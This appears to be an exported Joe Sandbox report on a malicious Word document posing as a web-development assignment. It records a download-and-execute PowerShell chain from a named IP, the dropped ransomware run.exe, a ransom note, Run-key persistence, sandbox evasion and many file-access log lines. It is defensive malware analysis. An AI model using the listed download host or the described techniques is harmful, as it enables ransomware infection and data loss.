      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\HTAGVDFUIE.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\HTAGVDFUIE.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ZBEDCJPBEY VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\ZTGJILHXQB VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\~$_webdev_assignment_dec2024.doc VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Desktop\~$_webdev_assignment_dec2024.doc VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\FENIVHOIKN.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\FENIVHOIKN.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\BPMLNOBVSB.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\KATAXZVCPS.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\KZWFNRXYKI.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\KZWFNRXYKI.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.jpg VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.xlsx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\UOOJJOZIRH.mp3 VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.pdf VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\WKXEWIOTXI.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\WUTJSCBCFX.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\WUTJSCBCFX.png VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Downloads\XZXHAVGRAG.docx VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Pictures VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Pictures\Camera Roll\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Pictures\Camera Roll\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\tsf.txt VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\tsf.txt VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\tsf.txt VolumeInformation
      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\p4yx0rl0s3\note.txt VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\encryption_date.txt VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\encryption_date.txt VolumeInformation
      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\p4yx0rl0s3\note.txt VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\encryption_date.txt VolumeInformation
      Source: C:\Users\user\p4yx0rl0s3\run.exeQueries volume information: C:\Users\user\p4yx0rl0s3\encryption_date.txt VolumeInformation
      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\p4yx0rl0s3\note.txt VolumeInformation
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information22
      Scripting
      Valid Accounts12
      Exploitation for Client Execution
      22
      Scripting
      11
      Process Injection
      2
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote ServicesData from Local System2
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium2
      Data Encrypted for Impact
      CredentialsDomainsDefault Accounts3
      PowerShell
      1
      Registry Run Keys / Startup Folder
      1
      Abuse Elevation Control Mechanism
      1
      Disable or Modify Tools
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      11
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
      Extra Window Memory Injection
      1
      Deobfuscate/Decode Files or Information
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Abuse Elevation Control Mechanism
      Cached Domain Credentials12
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Obfuscated Files or Information
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Extra Window Memory Injection
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579175 Sample: em_webdev_assignment_dec2024.doc Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 66 Multi AV Scanner detection for submitted file 2->66 68 Malicious encrypted Powershell command line found 2->68 70 Yara detected Powershell download and execute 2->70 72 9 other signatures 2->72 9 WINWORD.EXE 221 481 2->9         started        13 run.exe 2->13         started        15 run.exe 2->15         started        process3 file4 54 em_webdev_assignment_dec2024.doc (copy), Composite 9->54 dropped 78 Malicious encrypted Powershell command line found 9->78 80 Encrypted powershell cmdline option found 9->80 82 Office process queries suspicious COM object (likely to drop second stage) 9->82 17 powershell.exe 15 58 9->17         started        84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->84 86 Found direct / indirect Syscall (likely to bypass EDR) 13->86 22 cmd.exe 13->22         started        24 conhost.exe 13->24         started        26 cmd.exe 15->26         started        28 conhost.exe 15->28         started        signatures5 process6 dnsIp7 64 91.208.206.195, 49738, 49747, 80 ALEXHOSTMD unknown 17->64 52 C:\Users\user\p4yx0rl0s3\run.exe, PE32+ 17->52 dropped 74 Loading BitLocker PowerShell Module 17->74 76 Powershell drops PE file 17->76 30 run.exe 17->30         started        34 conhost.exe 17->34         started        36 conhost.exe 22->36         started        38 notepad.exe 22->38         started        40 conhost.exe 26->40         started        42 notepad.exe 26->42         started        file8 signatures9 process10 file11 56 C:\Users\user\p4yx0rl0s3\note.txt, ASCII 30->56 dropped 58 C:\Users\user\Desktop\...\XZXHAVGRAG.docx, data 30->58 dropped 60 C:\Users\user\Desktop\...\UMMBDNEQBN.jpg, data 30->60 dropped 62 3 other malicious files 30->62 dropped 88 Multi AV Scanner detection for dropped file 30->88 90 Writes a notice file (html or txt) to demand a ransom 30->90 92 Found direct / indirect Syscall (likely to bypass EDR) 30->92 94 Modifies existing user documents (likely ransomware behavior) 30->94 44 cmd.exe 30->44         started        46 conhost.exe 30->46         started        signatures12 process13 process14 48 conhost.exe 44->48         started        50 notepad.exe 44->50         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      em_webdev_assignment_dec2024.doc50%ReversingLabsDocument-Word.Trojan.Leonem
      em_webdev_assignment_dec2024.doc100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\p4yx0rl0s3\run.exe65%ReversingLabsWin64.Trojan.Generic
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://91.208.206.195/storefalse
        unknown
        http://91.208.206.195/d/assignment.zipfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://91.208.206.195powershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                https://github.com/clap-rs/clap/issues/home/kali/.cargo/registry/src/index.crates.io-6f17d22bba15001run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpfalse
                  high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1884072357.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1884072357.000000000504C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/powershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.1886993995.0000000005DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://docs.rs/getrandom#nodejs-es-module-supportrun.exe, 00000008.00000000.1882027598.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000010.00000000.2006797486.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpfalse
                                      high
                                      https://github.com/clap-rs/clap/issuesjrun.exe, 00000008.00000000.1882027598.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000010.00000000.2006797486.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmp, run.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpfalse
                                        high
                                        https://github.com/clap-rs/clap/issuesCOMMANDrun.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1884072357.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/clap-rs/clap/issuesrun.exe, 00000016.00000002.2093738566.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpfalse
                                              high
                                              http://go.microspowershell.exe, 00000004.00000002.1884072357.00000000054B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1884072357.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  91.208.206.195
                                                  unknownunknown
                                                  200019ALEXHOSTMDfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1579175
                                                  Start date and time:2024-12-21 00:12:07 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 6m 35s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:28
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • GSI enabled (VBA)
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:em_webdev_assignment_dec2024.doc
                                                  Detection:MAL
                                                  Classification:mal100.rans.bank.expl.evad.winDOC@30/338@0/1
                                                  EGA Information:Failed
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .doc
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 52.109.32.97, 23.218.208.109, 52.113.194.132, 52.111.252.15, 52.111.252.16, 52.111.252.17, 52.111.252.18, 20.189.173.15, 2.17.100.210, 2.17.100.200, 23.32.238.121, 23.32.238.105, 23.32.238.152, 52.109.68.129, 20.190.177.85, 172.202.163.200, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, onedscolprdwus14.westus.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.
                                                  • Execution Graph export aborted for target powershell.exe, PID 7268 because it is empty
                                                  • Execution Graph export aborted for target run.exe, PID 7724 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: em_webdev_assignment_dec2024.doc
                                                  TimeTypeDescription
                                                  18:13:10API Interceptor43x Sleep call for process: powershell.exe modified
                                                  23:13:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run p4yx0rl0s3 "C:\Users\user\p4yx0rl0s3\run.exe"
                                                  23:13:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run p4yx0rl0s3 "C:\Users\user\p4yx0rl0s3\run.exe"
                                                  No context
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ALEXHOSTMDSvcrhpjadgyclc.cmdGet hashmaliciousDBatLoaderBrowse
                                                  • 176.123.5.143
                                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                                  • 45.84.8.182
                                                  NLRpif3sEB.exeGet hashmaliciousUnknownBrowse
                                                  • 213.226.100.197
                                                  NLRpif3sEB.exeGet hashmaliciousUnknownBrowse
                                                  • 213.226.100.197
                                                  sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 176.123.5.14
                                                  http://server.citierupticx.com/specId/product-mje%EF%BC%A0ml.avio.co.jpGet hashmaliciousHTMLPhisherBrowse
                                                  • 91.208.197.216
                                                  2024-11 eStmt 5563019.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 176.123.1.130
                                                  otis.exeGet hashmaliciousUnknownBrowse
                                                  • 91.132.92.231
                                                  otis.exeGet hashmaliciousUnknownBrowse
                                                  • 91.132.92.231
                                                  armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 91.208.162.247
                                                  No context
                                                  No context
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):118
                                                  Entropy (8bit):3.5700810731231707
                                                  Encrypted:false
                                                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                  MD5:573220372DA4ED487441611079B623CD
                                                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                  Malicious:false
